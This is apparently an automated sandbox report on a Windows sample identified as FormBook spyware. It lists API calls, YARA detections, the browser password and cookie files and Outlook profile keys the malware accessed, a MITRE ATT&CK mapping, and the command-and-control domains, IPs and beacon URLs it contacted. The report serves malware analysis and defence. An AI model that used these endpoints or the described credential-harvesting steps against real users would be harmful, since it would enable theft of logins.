Source: eypfpUNFpbLX.exe, 00000006.00000000.2369823566.0000000001141000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4022391575.0000000001140000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4023500202.0000000001140000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: bintoday1.exe, eypfpUNFpbLX.exe, 00000006.00000000.2369823566.0000000001141000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4022391575.0000000001140000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4023500202.0000000001140000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: eypfpUNFpbLX.exe, 00000006.00000000.2369823566.0000000001141000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4022391575.0000000001140000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4023500202.0000000001140000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: eypfpUNFpbLX.exe, 00000006.00000000.2369823566.0000000001141000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4022391575.0000000001140000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4023500202.0000000001140000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00BB0698 cpuid

0_2_00BB0698

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00C08195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00C08195

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00BED27A GetUserNameW,

0_2_00BED27A

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00BCB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_00BCB952

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00B942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00B942DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\compact.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: bintoday1.exe	Binary or memory string: WIN_81
Source: bintoday1.exe	Binary or memory string: WIN_XP
Source: bintoday1.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: bintoday1.exe	Binary or memory string: WIN_XPe
Source: bintoday1.exe	Binary or memory string: WIN_VISTA
Source: bintoday1.exe	Binary or memory string: WIN_7
Source: bintoday1.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C11204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00C11204
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C11806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00C11806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
bintoday1.exe	63%	Virustotal		Browse
bintoday1.exe	63%	ReversingLabs	Win32.Trojan.Strab
bintoday1.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
fimgroup.net	1%	Virustotal	Browse
6rkdm.top	0%	Virustotal	Browse
shops.vipshopbuy.com	0%	Virustotal	Browse
jobworklanka.online	2%	Virustotal	Browse
www.dom-2.online	0%	Virustotal	Browse
www.loveinpoeipet07.site	2%	Virustotal	Browse
www.jobworklanka.online	2%	Virustotal	Browse
www.fimgroup.net	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://www.dom-2.online/6t1p/	0%	Avira URL Cloud	safe
http://www.limonchimneysweep.shop/n2gl/?oLy=-hKdflfxw6&cLStcv3=flitv4ONTDzavgdus+zcTsH6nWgS1QLhloTdmohmQPl3KhGoeMiAoTCl41HMocxZ34RiCsybNbAZ6Ep4mPYRLqm0WDj9ayw3PA1jxKqGfzp18YAn+IY5szwPiI05gk5QbUl5B1g=	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://www.dom-2.online/6t1p/?cLStcv3=5u/7pIClCxGMr2JDx2moDp4N5NUQR5UHhhh3f8bPAU6e1g5SUh+0OFL6u88M+0RJj1mDTEfrnKPtCcHZ9I9M5tKPqU536cb7UTbsX5MdChh4yVfj4lbg76/wDExADHyv3XJ8cq4=&oLy=-hKdflfxw6	0%	Avira URL Cloud	safe
http://www.kiristyle.shop/m39s/	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://www.kiristyle.shop/m39s/?oLy=-hKdflfxw6&cLStcv3=UQp9655FjW3LvDLkuw2PvKQDrSZERfsuMNaS	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://www.helloanecdotenow.info/9b27/?oLy=-hKdflfxw6&cLStcv3=7ENy1dnK+hlvjvEO/OaYGC3Wgmb4rYaSD+U+jb6JyxCjiQU3Pm3SylzrvkP1vqSBFdPksRSgAkGS8fPPQLcJJVTWiO9mdIE7BDDVXVUUUxr3BCXvrTsebkLO52NTcukFU1xGaVw=	0%	Avira URL Cloud	safe
http://www.fimgroup.net/m3ft/?cLStcv3=mm8fgD9+jitkhgs161OZt8fCms83PFFT8XhsXaqjQsukr7/M7pRfQgp4Nt/ggm/XryzwVs+W+lrB4JMnarTnzCQZM7KWEo1HwHoI3FMw782O73yIdszacYliHArJfGfO1B1Ji3g=&oLy=-hKdflfxw6	0%	Avira URL Cloud	safe
http://www.030002721.xyz/jpse/	0%	Avira URL Cloud	safe
https://www.google.com	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://www.fimgroup.net/m3ft/	0%	Avira URL Cloud	safe
http://www.030002721.xyz	0%	Avira URL Cloud	safe
http://www.helloanecdotenow.info/9b27/	0%	Avira URL Cloud	safe
http://www.jobworklanka.online/mm14/	0%	Avira URL Cloud	safe
http://www.yhqapp.com/?39988	0%	Avira URL Cloud	safe
https://www.google.com	0%	Virustotal		Browse
http://www.jobworklanka.online/mm14/?cLStcv3=CxHrv/DWf/f861hRjo0poFYX/xbpoqE9Pkz05rQHhXI0npb5DSaX7ma8TZVC8w6DWPy//ybPymtpw/3NO+S+AgB4ZcSH0lp13pJAkJlF+hiKkERgruIPxb4FabZ2eu3OSDY3yr0=&oLy=-hKdflfxw6	0%	Avira URL Cloud	safe
http://www.fimgroup.net:80/m3ft/?cLStcv3=mm8fgD9	0%	Avira URL Cloud	safe
http://www.yhqapp.com/?39988	0%	Virustotal		Browse
http://www.6rkdm.top/gzjk/?cLStcv3=YDlNDhHByhlf6nQelagaT3FTRjXu5jrNjAd5ZmuDrGe9JGDYJAs2Uym5b/cCl1RiDZ+iQgyIXf65KlrikbfSKljvf01yS/1iDTwvEAEyzsoYMlH0K0Blq6hvBg/o1tysCZp8w58=&oLy=-hKdflfxw6	0%	Avira URL Cloud	safe
http://www.6rkdm.top/gzjk/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fimgroup.net	62.149.128.40	true	true	1%, Virustotal, Browse	unknown
helloanecdotenow.info	3.33.130.190	true	true		unknown
030002721.xyz	65.21.196.90	true	true		unknown
limonchimneysweep.shop	198.57.245.28	true	true		unknown
6rkdm.top	18.162.124.14	true	true	0%, Virustotal, Browse	unknown
shops.vipshopbuy.com	35.244.245.121	true	false	0%, Virustotal, Browse	unknown
jobworklanka.online	91.184.0.200	true	true	2%, Virustotal, Browse	unknown
www.dom-2.online	199.59.243.226	true	true	0%, Virustotal, Browse	unknown
www.6rkdm.top	unknown	unknown	true		unknown
www.limonchimneysweep.shop	unknown	unknown	true		unknown
www.jobworklanka.online	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.helloanecdotenow.info	unknown	unknown	true		unknown
www.loveinpoeipet07.site	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.kiristyle.shop	unknown	unknown	true		unknown
www.fimgroup.net	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.030002721.xyz	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.limonchimneysweep.shop/n2gl/?oLy=-hKdflfxw6&cLStcv3=flitv4ONTDzavgdus+zcTsH6nWgS1QLhloTdmohmQPl3KhGoeMiAoTCl41HMocxZ34RiCsybNbAZ6Ep4mPYRLqm0WDj9ayw3PA1jxKqGfzp18YAn+IY5szwPiI05gk5QbUl5B1g=	true	Avira URL Cloud: safe	unknown
http://www.dom-2.online/6t1p/	true	Avira URL Cloud: safe	unknown
http://www.kiristyle.shop/m39s/	false	Avira URL Cloud: safe	unknown
http://www.dom-2.online/6t1p/?cLStcv3=5u/7pIClCxGMr2JDx2moDp4N5NUQR5UHhhh3f8bPAU6e1g5SUh+0OFL6u88M+0RJj1mDTEfrnKPtCcHZ9I9M5tKPqU536cb7UTbsX5MdChh4yVfj4lbg76/wDExADHyv3XJ8cq4=&oLy=-hKdflfxw6	true	Avira URL Cloud: safe	unknown
http://www.helloanecdotenow.info/9b27/?oLy=-hKdflfxw6&cLStcv3=7ENy1dnK+hlvjvEO/OaYGC3Wgmb4rYaSD+U+jb6JyxCjiQU3Pm3SylzrvkP1vqSBFdPksRSgAkGS8fPPQLcJJVTWiO9mdIE7BDDVXVUUUxr3BCXvrTsebkLO52NTcukFU1xGaVw=	true	Avira URL Cloud: safe	unknown
http://www.fimgroup.net/m3ft/?cLStcv3=mm8fgD9+jitkhgs161OZt8fCms83PFFT8XhsXaqjQsukr7/M7pRfQgp4Nt/ggm/XryzwVs+W+lrB4JMnarTnzCQZM7KWEo1HwHoI3FMw782O73yIdszacYliHArJfGfO1B1Ji3g=&oLy=-hKdflfxw6	true	Avira URL Cloud: safe	unknown
http://www.030002721.xyz/jpse/	true	Avira URL Cloud: safe	unknown
http://www.fimgroup.net/m3ft/	true	Avira URL Cloud: safe	unknown
http://www.helloanecdotenow.info/9b27/	true	Avira URL Cloud: safe	unknown
http://www.jobworklanka.online/mm14/	true	Avira URL Cloud: safe	unknown
http://www.jobworklanka.online/mm14/?cLStcv3=CxHrv/DWf/f861hRjo0poFYX/xbpoqE9Pkz05rQHhXI0npb5DSaX7ma8TZVC8w6DWPy//ybPymtpw/3NO+S+AgB4ZcSH0lp13pJAkJlF+hiKkERgruIPxb4FabZ2eu3OSDY3yr0=&oLy=-hKdflfxw6	true	Avira URL Cloud: safe	unknown
http://www.6rkdm.top/gzjk/?cLStcv3=YDlNDhHByhlf6nQelagaT3FTRjXu5jrNjAd5ZmuDrGe9JGDYJAs2Uym5b/cCl1RiDZ+iQgyIXf65KlrikbfSKljvf01yS/1iDTwvEAEyzsoYMlH0K0Blq6hvBg/o1tysCZp8w58=&oLy=-hKdflfxw6	true	Avira URL Cloud: safe	unknown
http://www.6rkdm.top/gzjk/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.kiristyle.shop/m39s/?oLy=-hKdflfxw6&cLStcv3=UQp9655FjW3LvDLkuw2PvKQDrSZERfsuMNaS	compact.exe, 00000007.00000002.4026214953.0000000003DBC000.00000004.10000000.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.000000000357C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com	compact.exe, 00000007.00000002.4026214953.0000000003C2A000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000007.00000002.4028193261.0000000005B90000.00000004.00000800.00020000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.00000000033EA000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.030002721.xyz	eypfpUNFpbLX.exe, 00000009.00000002.4026387029.0000000004FE7000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.yhqapp.com/?39988	eypfpUNFpbLX.exe, 00000009.00000002.4024011775.0000000003A32000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fimgroup.net:80/m3ft/?cLStcv3=mm8fgD9	compact.exe, 00000007.00000002.4026214953.0000000003F4E000.00000004.10000000.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.000000000370E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
18.162.124.14	6rkdm.top	United States	16509	AMAZON-02US	true
62.149.128.40	fimgroup.net	Italy	31034	ARUBA-ASNIT	true
198.57.245.28	limonchimneysweep.shop	United States	46606	UNIFIEDLAYER-AS-1US	true
91.184.0.200	jobworklanka.online	Netherlands	197902	HOSTNETNL	true
65.21.196.90	030002721.xyz	United States	199592	CP-ASDE	true
199.59.243.226	www.dom-2.online	United States	395082	BODIS-NJUS	true
35.244.245.121	shops.vipshopbuy.com	United States	15169	GOOGLEUS	false
3.33.130.190	helloanecdotenow.info	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501089
Start date and time:	2024-08-29 12:21:47 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	bintoday1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@9/8
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 97% Number of executed functions: 48 Number of non-executed functions: 299
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target eypfpUNFpbLX.exe, PID 1008 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
06:23:47	API Interceptor	5963043x Sleep call for process: compact.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
18.162.124.14	Filename.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	www.6rkdm.top/tu8i/
62.149.128.40	Atlas Copco- WEPCO.exe	Get hash	malicious	FormBook	Browse	www.fimgroup.net/fqzh/
	file No83293 PO & Specification.gz.exe	Get hash	malicious	FormBook	Browse	www.pyrlist-test.cloud/apau/?32gdi4=omLpuGVmsyOHdGpRdjgRwIdS8onMLPtYZwnQxrZ2pdkklfz3vB2UBDvQaSU1YR7Xr6uYdwMb/adcCe42hD+vmDiudnADMik3xc+FpjXk83bBo7qDRClwT378wlWS9dAj4UFWXQx8lPSh&wLAt=m8MLyLih-H4lf
	64MXEd79F1.exe	Get hash	malicious	FormBook	Browse	www.autoreediritto.com/aucq/?pZXDmpb8=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&fv=tdYXXJI8Drl4
	09090.exe	Get hash	malicious	FormBook	Browse	www.autoreediritto.com/aucq/?zFQHE=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&yF3=b0i4Y00xHtf
	8bwKawHg0Z.exe	Get hash	malicious	FormBook	Browse	www.autoreediritto.com/aucq/?m4kp=Q04lO4tHCdMhGRPp&Z2n4kTEh=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqUenkRjtIRRn+PcJ+980YglFIHv1RxaMTu2bilHhQR8NY0g==
	98790ytt.exe	Get hash	malicious	FormBook	Browse	www.autoreediritto.com/aucq/?GHo=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&i2=tZJdhrYHabWX4H
	aertrh.exe	Get hash	malicious	FormBook	Browse	www.autoreediritto.com/aucq/?bbtD=v8Pp0x&mXnt=KoQMLvtx3M4SfAq91ckdEaeNevOygAbB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqWc3KGV5GAX2rZsRT+8QcgDF4B+0ExfJRqG4=
	RB_VAC_1.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.stnlab.net/twn7/
	Company profile.pif.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.insertcoen.com/wu8v/
	NdYuOgHbM9.exe	Get hash	malicious	FormBook	Browse	www.insertcoen.com/wu8v/
